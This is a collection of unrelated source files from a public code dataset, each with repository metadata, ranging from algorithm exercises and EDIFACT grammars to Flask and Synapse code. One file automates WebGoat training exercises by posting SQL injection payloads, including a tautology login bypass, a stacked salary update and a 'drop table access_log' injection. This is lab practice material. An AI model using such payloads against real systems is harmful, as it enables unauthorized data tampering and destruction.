| permissive | partho-maple/coding-interview-gym | 5e8af7d404c28d4b9b52e5cffc540fd51d8025cf | 20ae1a048eddbc9a32c819cf61258e2b57572f05 | refs/heads/master | 2022-09-11T16:36:01.702626 | 2022-03-14T08:39:47 | 2022-03-14T08:39:47 | 69,802,909 | 862 | 438 | MIT | 2022-08-18T06:42:46 | 2016-10-02T14:51:31 | Python | UTF-8 | Python | false | false | 797 | py | from collections import defaultdict
import heapq
class FreqStack(object):
def __init__(self):
self.counter = defaultdict(int)
self.stackIdx = -1 # initially the stack is empty
self.maxHeap = []
def push(self, x):
"""
:type x: int
:rtype: None
"""
self.counter[x] += 1
self.stackIdx += 1
heapq.heappush(self.maxHeap, (-self.counter[x], -self.stackIdx, x))
def pop(self):
"""
:rtype: int
"""
topElement = heapq.heappop(self.maxHeap)
count, idx, x = -topElement[0], -topElement[1], topElement[2]
self.counter[x] -= 1
return x
# Your FreqStack object will be instantiated and called as such:
# obj = FreqStack()
# obj.push(x)
# param_2 = obj.pop() | [
"[email protected]"
]
| |
7c5f10be6bb29de0efad4fe84a70e7dd2449fd64 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D01B/MSCONSD01BUN.py | eb4f55884635f28f92c53726be35f53eb089349d | []
| no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,763 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD01BUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 1, MAX: 9},
{ID: 'CUX', MIN: 0, MAX: 9},
{ID: 'RFF', MIN: 0, MAX: 9, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
]},
{ID: 'NAD', MIN: 0, MAX: 99, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 9, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
]},
{ID: 'CTA', MIN: 0, MAX: 9, LEVEL: [
{ID: 'COM', MIN: 0, MAX: 9},
]},
]},
{ID: 'UNS', MIN: 1, MAX: 1},
{ID: 'NAD', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'LOC', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
{ID: 'RFF', MIN: 0, MAX: 99, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
]},
{ID: 'CCI', MIN: 0, MAX: 99, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 99},
]},
{ID: 'LIN', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'PIA', MIN: 0, MAX: 9},
{ID: 'IMD', MIN: 0, MAX: 9},
{ID: 'PRI', MIN: 0, MAX: 9},
{ID: 'NAD', MIN: 0, MAX: 9},
{ID: 'MOA', MIN: 0, MAX: 9},
{ID: 'QTY', MIN: 1, MAX: 9999, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
{ID: 'STS', MIN: 0, MAX: 9},
]},
{ID: 'CCI', MIN: 0, MAX: 99, LEVEL: [
{ID: 'MEA', MIN: 0, MAX: 99},
{ID: 'DTM', MIN: 0, MAX: 9},
]},
]},
]},
]},
{ID: 'CNT', MIN: 0, MAX: 99},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"[email protected]"
]
| |
6f5980258752082c35aaff63112e57d84ac32d19 | 21fec19cb8f74885cf8b59e7b07d1cd659735f6c | /chapter_13/getone-urllib.py | 879783dfb46bea3276181cea113fd47ade1bf7c0 | [
"MIT"
]
| permissive | bimri/programming_python | ec77e875b9393179fdfb6cbc792b3babbdf7efbe | ba52ccd18b9b4e6c5387bf4032f381ae816b5e77 | refs/heads/master | 2023-09-02T12:21:11.898011 | 2021-10-26T22:32:34 | 2021-10-26T22:32:34 | 394,783,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | "Using urllib to Download Files"
'''
Python urllib.request module: given an Internet address
string—a URL, or Universal Resource Locator—this module opens a connection
to the specified server and returns a file-like object ready to be read with normal file
object method calls (e.g., read, readline).
We can use such a higher-level interface to download anything with an address on the
Web—files published by FTP sites (using URLs that start with ftp://); web pages and
output of scripts that live on remote servers (using http:// URLs); and even local files
(using file:// URLs).
'''
#!/usr/local/bin/python
"""
A Python script to download a file by FTP by its URL string; use higher-level
urllib instead of ftplib to fetch file; urllib supports FTP, HTTP, client-side
HTTPS, and local files, and handles proxies, redirects, cookies, and more;
urllib also allows downloads of html pages, images, text, etc.; see also
Python html/xml parsers for web pages fetched by urllib in Chapter 19;
"""
import os, getpass
from urllib.request import urlopen # socket-based web tools
filename = 'monkeys.jpg' # remote/local filename
password = getpass.getpass('Pswd?')
remoteaddr = 'ftp://lutz:%[email protected]/%s;type=i' % (password, filename)
print('Downloading', remoteaddr)
# this works too:
# urllib.request.urlretrieve(remoteaddr, filename)
remotefile = urlopen(remoteaddr) # return input file-like object
localfile = open(filename, 'wb') # where to store data locally
localfile.write(remotefile.read())
localfile.close()
remotefile.close()
'''
Technically speaking, urllib.request supports a variety of Internet protocols (HTTP,
FTP, and local files). Unlike ftplib, urllib.request is generally used for reading remote
objects, not for writing or uploading them (though the HTTP and FTP protocols support
file uploads too). As with ftplib, retrievals must generally be run in threads if
blocking is a concern.
'''
| [
"[email protected]"
]
| |
1d4682439a3ec9cebb7221e6ed9577f7be10a86c | 41cd61226440c7f0a6fcf77f7e4f65e65c28aaa1 | /wg_auto/a1_inject/sql_injection/intro.py | 2a1bcbc73989354939d03940f43f8d0cb3c7b42d | []
| no_license | xx-zhang/webgoat_auto | 6d99d98148e180b6eacf46c5d2b4de81b552fb1e | 8d47d6af68530940987a272224e9c21f870bf402 | refs/heads/master | 2023-04-03T22:24:54.675321 | 2021-04-16T09:23:30 | 2021-04-16T09:23:30 | 358,497,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,860 | py | # coding:utf-8
from wg_auto.base import request_wrap
def sql2_test(q="select department from employees where first_name='Bob' and last_name='Franco'"):
__url = '/SqlInjection/attack2'
return request_wrap(method='post', url=__url, data={"query": q})
def sql3_test(q="update employees set department='Sales' where "
"first_name='Tobi' and last_name='Barnett'"):
__url = '/SqlInjection/attack3'
return request_wrap(method='post', url=__url, data={"query": q})
def sql4_test(q='alter table employees add phone varchar(20)'):
__url = '/SqlInjection/attack4'
return request_wrap(method='post', url=__url, data={"query": q})
def sql5_test(q='grant alter table to UnauthorizedUser'):
__url = '/SqlInjection/attack5'
return request_wrap(method='post', url=__url, data={"query": q})
def sql9_test():
__url = "/SqlInjection/assignment5a"
data = {"account": "Smith'", "operator": "or", "injection": "'1'='1"}
return request_wrap(method='post', url=__url, data=data)
def sql10_test():
__url = "/SqlInjection/assignment5b"
data = {"login_count": "1", "userid": "1 or 1=1"}
return request_wrap(method='post', url=__url, data=data)
def sql11_test():
__url = "/SqlInjection/attack8"
data = {"name": "Smith", "auth_tan": "1' or '1'='1"}
return request_wrap(method='post', url=__url, data=data)
def sql12_test():
__url = "/SqlInjection/attack9"
# data = {"name": "Smith", "auth_tan": "3SL99A' or '1'='1"}
data = {"name": "Smith", "auth_tan": "1' or 1=1;update employees set salary = 90000 where last_name = 'Smith';--+"}
return request_wrap(method='post', url=__url, data=data)
def sql13_test():
__url = "/SqlInjection/attack10"
data = {"action_string": "1' or 1=1;drop table access_log;--"}
return request_wrap(method='post', url=__url, data=data)
| [
"[email protected]"
]
| |
a40a61da4b281943142d8d4709eff02cb23d9dca | 2ca3b6cc4f9145438e283d4e055e55fff550ec90 | /flask/hello.py | 68f2d487bdd7eac37fde1aad5bf11e7ee96000bc | []
| no_license | manuck/python_practice | e39a7e3be41608dd9bf8a7bdb9228a22ceb652b6 | 7adbefbe616f305430c75e896d817ec8e7f938d3 | refs/heads/master | 2020-04-12T02:45:06.427693 | 2018-12-21T01:15:31 | 2018-12-21T01:15:31 | 162,252,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | from flask import Flask, render_template
import datetime
import random
app = Flask(__name__)
@app.route("/")
def hello():
return render_template("index.html")
@app.route("/ssafy")
def ssafy():
return "방가방가룽~"
@app.route("/isitchristmas")
def christmas():
if datetime.datetime.month == 12:
if datetime.datetime.day == 25:
return"ㅇ"
else:
return"ㄴ"
# variable routing
@app.route("/greeting/<string:name>")
def greeting(name):
return f"{name} 안녕하십니까? 인사 오지게 박습니다."
@app.route("/cube/<int:num>")
def cube(num):
sq = num**3
return f"{sq}"
@app.route("/dinner")
def dinner():
menu = ["햄버거", "수육", "치킨"]
dinner = random.choice(menu)
return render_template("dinner.html", dinner=dinner, menu=menu)
@app.route("/music")
def music():
mlist = ["아이유-이름에게", "멜로망스-욕심", "태연-기억을 걷는 시간"]
music = random.choice(mlist)
return render_template("music.html", music=music, mlist=mlist) | [
"[email protected]"
]
| |
db619209d99e9c11e7884096814e36d0ecfb565e | bdfd3937f6222157d436dbdc7d7efad2b1b3f8f6 | /appengine/logging/writing_logs/main_test.py | 339caa4ef66206268f60e87b58a9339a9577a20d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | b-fong/python-docs-samples | 81f089db6f4378cb7cfd278d3c8f9fb198aeb504 | 493f850306f7860a85948365ba4ee70500bec0d6 | refs/heads/master | 2020-12-25T08:37:37.864777 | 2016-02-17T22:54:50 | 2016-02-17T22:54:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from testing import AppEngineTest
import webtest
from . import main
class TestWritingLogs(AppEngineTest):
def setUp(self):
super(TestWritingLogs, self).setUp()
self.app = webtest.TestApp(main.app)
def test_get(self):
response = self.app.get('/')
self.assertEqual(response.status_int, 200)
self.assertTrue('Logging example' in response.text)
| [
"[email protected]"
]
| |
c531e8963a8bdd1fd5685361f3d120b112d7931c | f0acc407f95b758fa734f5ed5f6506a8b20d2706 | /docs_src/parameter_types/bool/tutorial004_an.py | 1cb42fcc86f69fbffbf6fb0cd4576c958c05ba79 | [
"MIT"
]
| permissive | shnups/typer | ede6d86c5b169e8caa7823b0552f8531ed041f84 | e0b207f3f577cb2e59fdd60da39686a2f5ed0e77 | refs/heads/master | 2023-08-31T01:54:21.168547 | 2023-08-01T09:36:09 | 2023-08-01T09:36:09 | 313,047,732 | 0 | 0 | MIT | 2020-11-15T14:22:06 | 2020-11-15T14:22:05 | null | UTF-8 | Python | false | false | 276 | py | import typer
from typing_extensions import Annotated
def main(in_prod: Annotated[bool, typer.Option(" /--demo", " /-d")] = True):
if in_prod:
print("Running in production")
else:
print("Running demo")
if __name__ == "__main__":
typer.run(main)
| [
"[email protected]"
]
| |
66034e4237f03e3feea6cf0c1cb3a5d2f84b4f3e | 7f81c7b4110640f73b769b6a41e9ef3ae2495611 | /bert_multitask_learning/__init__.py | e9e702d00da1d9e2c6bc914b6a59975fe2a14257 | [
"Apache-2.0"
]
| permissive | ml2457/bert-multitask-learning | 26464c6d1ad94e7aeebd93d02f2604298ebde5db | 993c1e6ca279e90e12ce4a684260219b18bbea70 | refs/heads/master | 2023-02-10T14:05:27.643723 | 2021-01-10T15:22:11 | 2021-01-10T15:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | __version__ = "0.6.10"
from .read_write_tfrecord import *
from .input_fn import *
from .model_fn import *
from .params import *
from .top import *
from .run_bert_multitask import *
from .utils import *
from .preproc_decorator import preprocessing_fn
from . import predefined_problems
from .special_tokens import *
| [
"[email protected]"
]
| |
f78963add4b60ef66c7ce35ce18852ad3a6e9be9 | 33daf4c69a8f46d7ad8d93eaa73fc60e36fd022d | /gestion/asignaciones/20150908-todos-cuerpos/procesar_tabla.py~ | 6817418317f466cb6fa5e7e4a9ff2c5abf0fe429 | []
| no_license | OscarMaestre/estructurado | 81cfc9412b77d5015be1bebf66785c357746d8e2 | 7649747e48128cb9c17dee937574e9490fcc9087 | refs/heads/master | 2021-01-10T15:05:47.695362 | 2016-04-28T07:30:50 | 2016-04-28T07:30:50 | 53,923,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,671 | #!/usr/bin/env python3
import re
import sys
import os
NUM_SUBDIRECTORIOS_ANTERIORES=1
SEPARADOR=os.sep
RUTA_PAQUETE_BD=(".."+SEPARADOR) * NUM_SUBDIRECTORIOS_ANTERIORES
DIRECTORIO= RUTA_PAQUETE_BD + "db_nombramientos"
#aqui = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, DIRECTORIO)
import GestorDB
import ListaCampos
archivo=sys.argv[1]
re_dni="[0-9]{7,8}[A-Z]"
#especialidad="[PWB0]59[0-9][0-9]{3}"
re_especialidad="\- [PWB0]59([0-9]{4})"
re_codigo_centro="[0-9]{8}"
re_codigo_centro_ciudad_real="^13[0-9]{6}$"
re_fecha="[0-9]{2}/[0-9]{2}/[0-9]{4}"
def linea_contiene_patron(patron, linea):
expresion=re.compile(patron)
if expresion.search(linea):
return True
return False
def extraer_patron(patron, linea):
expresion=re.compile(patron)
concordancia=expresion.search(linea)
if concordancia:
inicio=concordancia.start()
final=concordancia.end()
return concordancia.string[inicio:final]
print ("No concordancia")
def extraer_codigo_centro(linea):
return extraer_patron(re_codigo_centro, linea)
def extraer_localidad(linea):
localidad=linea[9:51]
return localidad.strip()
def extraer_dni(linea):
trozo=linea[51:60]
return extraer_patron(re_dni, linea)
def extraer_nombre(linea):
linea=linea[49:]
pos=linea.find("-")
if pos==-1:
return "Error:"+linea
return linea[pos+2:].strip()
cadena_sql="""insert into asignaciones_18092015 values
(
*C1*'{0}'*C1*,
*C2*'{1}'*C2*,
*C3*'{2}'*C3*,
*C4*'{3}'*C4*,
*C5*'{4}'*C5*,
*C6*'{5}'*C6*,
*C7*'{6}'*C7*,
*C8*'{7}'*C8*
);
"""
def generar_linea_sql(lista_campos):
dni=lista_campos[0]
cod_centro=lista_campos[3]
fecha_fin=lista_campos[7]
if not linea_contiene_patron(re_codigo_centro_ciudad_real, cod_centro):
cod_centro="9888"
sql= "update gaseosa set cod_centro='"+cod_centro+"' where dni='"+dni+"';\n"
sql+="update gaseosa set auxiliar='HACIENDO SUSTITUCION HASTA "+fecha_fin+"' where dni='"+dni+"';\n"
return sql
def generar_linea_sql2(lista_campos):
valores=":".join(lista_campos)
return valores
archivo=open(archivo,"r")
lineas=archivo.readlines()
total_lineas=len(lineas)
codigo_especialidad=""
lista_inserts_sql3=[]
for i in range(0, total_lineas):
linea=lineas[i]
lista_campos=[]
lista_campos_para_insertar=ListaCampos.ListaCampos()
if (linea_contiene_patron(re_especialidad, linea)):
codigo_especialidad=extraer_patron(re_especialidad, linea)
if (linea_contiene_patron(re_dni, linea)):
linea_limpia=linea.strip()
codigo_centro=extraer_codigo_centro(linea_limpia)
localidad=extraer_localidad(linea_limpia)
dni = extraer_dni(linea_limpia)
nombre = extraer_nombre(linea_limpia)
linea_siguiente=lineas[i+1]
nombre_centro=linea_siguiente[0:51].strip()
trozo_fecha1=linea_siguiente[72:132]
fecha_1=extraer_patron(re_fecha, trozo_fecha1)
trozo_fecha2=linea_siguiente[133:]
fecha_2=extraer_patron(re_fecha, trozo_fecha2)
lista_campos=[dni, nombre, codigo_especialidad, codigo_centro, nombre_centro, localidad, fecha_1, fecha_2]
linea_sql=generar_linea_sql(lista_campos)
lista_campos_para_insertar.anadir("nif", dni, ListaCampos.ListaCampos.CADENA)
lista_campos_para_insertar.anadir("nombre_completo", nombre, ListaCampos.ListaCampos.CADENA)
lista_campos_para_insertar.anadir("fecha_inicio", fecha_1, ListaCampos.ListaCampos.CADENA)
lista_campos_para_insertar.anadir("fecha_fin", fecha_2, ListaCampos.ListaCampos.CADENA)
lista_campos_para_insertar.anadir("procedimiento", "Adjudicacion 08-09-2015", ListaCampos.ListaCampos.CADENA)
lista_campos_para_insertar.anadir("especialidad", codigo_especialidad, ListaCampos.ListaCampos.CADENA)
lista_campos_para_insertar.anadir("codigo_centro", codigo_centro, ListaCampos.ListaCampos.CADENA)
print (linea_sql)
#print cadena_sql.format(codigo_especialidad, codigo_centro, localidad, dni, nombre, nombre_centro, fecha_1, fecha_2)
i=i+1
lista_inserts_sql3.append(lista_campos_para_insertar.generar_insert("nombramientos"))
archivo.close()
GestorDB.BD_RESULTADOS.ejecutar_sentencias(lista_inserts_sql3)
| [
"[email protected]"
]
| ||
233ad6379183648285b533d82dfc4da333fbcf94 | 1b2a1f807b98034567e936b9b5c76c2fc89b908a | /adj_tf/models/marian/tokenization_marian.py | 2eec924e0878443bd77b620a91f78c0f333ee2ec | []
| no_license | Adreambottle/Transformer2GP | 48c955d8eb155caef4c24a3c03ee3aa9ab0bd3da | 5ba1a5005c2ad21066304cdeb1d7c2587c8191da | refs/heads/main | 2023-07-07T14:17:51.673437 | 2021-08-17T14:14:56 | 2021-08-17T14:14:56 | 397,279,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,967 | py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
import warnings
from contextlib import contextmanager
from pathlib import Path
from shutil import copyfile
from typing import Dict, List, Optional, Tuple, Union
import sentencepiece
from ...tokenization_utils import PreTrainedTokenizer
vocab_files_names = {
"source_spm": "source.spm",
"target_spm": "target.spm",
"vocab": "vocab.json",
"tokenizer_config_file": "tokenizer_config.json",
}
PRETRAINED_VOCAB_FILES_MAP = {
"source_spm": {"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/source.spm"},
"target_spm": {"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/target.spm"},
"vocab": {"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/vocab.json"},
"tokenizer_config_file": {
"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/tokenizer_config.json"
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {"Helsinki-NLP/opus-mt-en-de": 512}
PRETRAINED_INIT_CONFIGURATION = {}
# Example URL https://huggingface.co/Helsinki-NLP/opus-mt-en-de/resolve/main/vocab.json
class MarianTokenizer(PreTrainedTokenizer):
r"""
Construct a Marian tokenizer. Based on `SentencePiece <https://github.com/google/sentencepiece>`__.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizer` which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
source_spm (:obj:`str`):
`SentencePiece <https://github.com/google/sentencepiece>`__ file (generally has a .spm extension) that
contains the vocabulary for the source language.
target_spm (:obj:`str`):
`SentencePiece <https://github.com/google/sentencepiece>`__ file (generally has a .spm extension) that
contains the vocabulary for the target language.
source_lang (:obj:`str`, `optional`):
A string representing the source language.
target_lang (:obj:`str`, `optional`):
A string representing the target language.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
eos_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The end of sequence token.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
model_max_length (:obj:`int`, `optional`, defaults to 512):
The maximum sentence length the model accepts.
additional_special_tokens (:obj:`List[str]`, `optional`, defaults to :obj:`["<eop>", "<eod>"]`):
Additional special tokens used by the tokenizer.
Examples::
>>> from adj_tf import MarianTokenizer
>>> tok = MarianTokenizer.from_pretrained('Helsinki-NLP/opus-mt-en-de')
>>> src_texts = [ "I am a small frog.", "Tom asked his teacher for advice."]
>>> tgt_texts = ["Ich bin ein kleiner Frosch.", "Tom bat seinen Lehrer um Rat."] # optional
>>> batch_enc = tok.prepare_seq2seq_batch(src_texts, tgt_texts=tgt_texts, return_tensors="pt")
>>> # keys [input_ids, attention_mask, labels].
>>> # model(**batch) should work
"""
vocab_files_names = vocab_files_names
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
language_code_re = re.compile(">>.+<<") # type: re.Pattern
def __init__(
self,
vocab,
source_spm,
target_spm,
source_lang=None,
target_lang=None,
unk_token="<unk>",
eos_token="</s>",
pad_token="<pad>",
model_max_length=512,
**kwargs
):
super().__init__(
# bos_token=bos_token, unused. Start decoding with config.decoder_start_token_id
source_lang=source_lang,
target_lang=target_lang,
unk_token=unk_token,
eos_token=eos_token,
pad_token=pad_token,
model_max_length=model_max_length,
**kwargs,
)
assert Path(source_spm).exists(), f"cannot find spm source {source_spm}"
self.encoder = load_json(vocab)
if self.unk_token not in self.encoder:
raise KeyError("<unk> token must be in vocab")
assert self.pad_token in self.encoder
self.decoder = {v: k for k, v in self.encoder.items()}
self.source_lang = source_lang
self.target_lang = target_lang
self.supported_language_codes: list = [k for k in self.encoder if k.startswith(">>") and k.endswith("<<")]
self.spm_files = [source_spm, target_spm]
# load SentencePiece model for pre-processing
self.spm_source = load_spm(source_spm)
self.spm_target = load_spm(target_spm)
self.current_spm = self.spm_source
# Multilingual target side: default to using first supported language code.
self._setup_normalizer()
def _setup_normalizer(self):
try:
from sacremoses import MosesPunctNormalizer
self.punc_normalizer = MosesPunctNormalizer(self.source_lang).normalize
except (ImportError, FileNotFoundError):
warnings.warn("Recommended: pip install sacremoses.")
self.punc_normalizer = lambda x: x
def normalize(self, x: str) -> str:
"""Cover moses empty string edge case. They return empty list for '' input!"""
return self.punc_normalizer(x) if x else ""
def _convert_token_to_id(self, token):
return self.encoder.get(token, self.encoder[self.unk_token])
def remove_language_code(self, text: str):
"""Remove language codes like <<fr>> before sentencepiece"""
match = self.language_code_re.match(text)
code: list = [match.group(0)] if match else []
return code, self.language_code_re.sub("", text)
def _tokenize(self, text: str) -> List[str]:
code, text = self.remove_language_code(text)
pieces = self.current_spm.EncodeAsPieces(text)
return code + pieces
def _convert_id_to_token(self, index: int) -> str:
"""Converts an index (integer) in a token (str) using the encoder."""
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens: List[str]) -> str:
"""Uses target language sentencepiece model"""
return self.spm_target.DecodePieces(tokens)
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None) -> List[int]:
"""Build model inputs from a sequence by appending eos_token_id."""
if token_ids_1 is None:
return token_ids_0 + [self.eos_token_id]
# We don't expect to process pairs, but leave the pair logic for API consistency
return token_ids_0 + token_ids_1 + [self.eos_token_id]
@contextmanager
def as_target_tokenizer(self):
"""
Temporarily sets the tokenizer for encoding the targets. Useful for tokenizer associated to
sequence-to-sequence models that need a slightly different processing for the labels.
"""
self.current_spm = self.spm_target
yield
self.current_spm = self.spm_source
@property
def vocab_size(self) -> int:
return len(self.encoder)
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
save_dir = Path(save_directory)
assert save_dir.is_dir(), f"{save_directory} should be a directory"
save_json(
self.encoder,
save_dir / ((filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["vocab"]),
)
for orig, f in zip(["source.spm", "target.spm"], self.spm_files):
dest_path = save_dir / ((filename_prefix + "-" if filename_prefix else "") + Path(f).name)
if not dest_path.exists():
copyfile(f, save_dir / orig)
return tuple(
save_dir / ((filename_prefix + "-" if filename_prefix else "") + f) for f in self.vocab_files_names
)
def get_vocab(self) -> Dict:
vocab = self.encoder.copy()
vocab.update(self.added_tokens_encoder)
return vocab
def __getstate__(self) -> Dict:
state = self.__dict__.copy()
state.update({k: None for k in ["spm_source", "spm_target", "current_spm", "punc_normalizer"]})
return state
def __setstate__(self, d: Dict) -> None:
self.__dict__ = d
self.spm_source, self.spm_target = (load_spm(f) for f in self.spm_files)
self.current_spm = self.spm_source
self._setup_normalizer()
def num_special_tokens_to_add(self, **unused):
"""Just EOS"""
return 1
def _special_token_mask(self, seq):
all_special_ids = set(self.all_special_ids) # call it once instead of inside list comp
all_special_ids.remove(self.unk_token_id) # <unk> is only sometimes special
return [1 if x in all_special_ids else 0 for x in seq]
def get_special_tokens_mask(
self, token_ids_0: List, token_ids_1: Optional[List] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""Get list where entries are [1] if a token is [eos] or [pad] else 0."""
if already_has_special_tokens:
return self._special_token_mask(token_ids_0)
elif token_ids_1 is None:
return self._special_token_mask(token_ids_0) + [1]
else:
return self._special_token_mask(token_ids_0 + token_ids_1) + [1]
def load_spm(path: str) -> sentencepiece.SentencePieceProcessor:
spm = sentencepiece.SentencePieceProcessor()
spm.Load(path)
return spm
def save_json(data, path: str) -> None:
with open(path, "w") as f:
json.dump(data, f, indent=2)
def load_json(path: str) -> Union[Dict, List]:
with open(path, "r") as f:
return json.load(f)
| [
"[email protected]"
]
| |
6d00fe5a1897d38b38e75686b9f721e7d3b4fd16 | fc778e05df051a0773d80f867b1c84542b0a4b24 | /lab/lab06/tests/q114.py | aaa2d192866854e477170552bc1f816f32a05d9d | []
| no_license | yukgu/data-6 | d873e7231058b01365b278edc7ded4afade05b55 | e96c0d864f58b7041dfb0820d3e469927eac97b0 | refs/heads/master | 2022-11-28T18:48:17.515825 | 2020-08-12T22:55:48 | 2020-08-12T22:55:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 582 | py | test = {
"name": "Question 1.1.4.",
"points": 1,
"hidden": False,
"suites": [
{
"cases": [
{
"code": r"""
>>> import numpy as np
>>> np.isclose(berkeley_avg_in_thousands, 782.37)
True
""",
"hidden": False,
"locked": False,
},
],
"scored": True,
"setup": "",
"teardown": "",
"type": "doctest"
},
]
} | [
"[email protected]"
]
| |
3ef598f244237952f1ffa69ac0f468555824db8b | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/matrix-org_synapse/synapse-master/synapse/storage/registration.py | 26be6060c3be0523d8fdc939263fa610b948502c | []
| no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 17,431 | py | # -*- coding: utf-8 -*-
# Copyright 2014 - 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from twisted.internet import defer
from synapse.api.errors import StoreError, Codes
from synapse.storage import background_updates
from synapse.util.caches.descriptors import cached, cachedInlineCallbacks
class RegistrationStore(background_updates.BackgroundUpdateStore):
def __init__(self, hs):
super(RegistrationStore, self).__init__(hs)
self.clock = hs.get_clock()
self.register_background_index_update(
"access_tokens_device_index",
index_name="access_tokens_device_id",
table="access_tokens",
columns=["user_id", "device_id"],
)
self.register_background_index_update(
"refresh_tokens_device_index",
index_name="refresh_tokens_device_id",
table="refresh_tokens",
columns=["user_id", "device_id"],
)
@defer.inlineCallbacks
def add_access_token_to_user(self, user_id, token, device_id=None):
"""Adds an access token for the given user.
Args:
user_id (str): The user ID.
token (str): The new access token to add.
device_id (str): ID of the device to associate with the access
token
Raises:
StoreError if there was a problem adding this.
"""
next_id = self._access_tokens_id_gen.get_next()
yield self._simple_insert(
"access_tokens",
{
"id": next_id,
"user_id": user_id,
"token": token,
"device_id": device_id,
},
desc="add_access_token_to_user",
)
def register(self, user_id, token=None, password_hash=None,
was_guest=False, make_guest=False, appservice_id=None,
create_profile_with_localpart=None, admin=False):
"""Attempts to register an account.
Args:
user_id (str): The desired user ID to register.
token (str): The desired access token to use for this user. If this
is not None, the given access token is associated with the user
id.
password_hash (str): Optional. The password hash for this user.
was_guest (bool): Optional. Whether this is a guest account being
upgraded to a non-guest account.
make_guest (boolean): True if the the new user should be guest,
false to add a regular user account.
appservice_id (str): The ID of the appservice registering the user.
create_profile_with_localpart (str): Optionally create a profile for
the given localpart.
Raises:
StoreError if the user_id could not be registered.
"""
return self.runInteraction(
"register",
self._register,
user_id,
token,
password_hash,
was_guest,
make_guest,
appservice_id,
create_profile_with_localpart,
admin
)
def _register(
self,
txn,
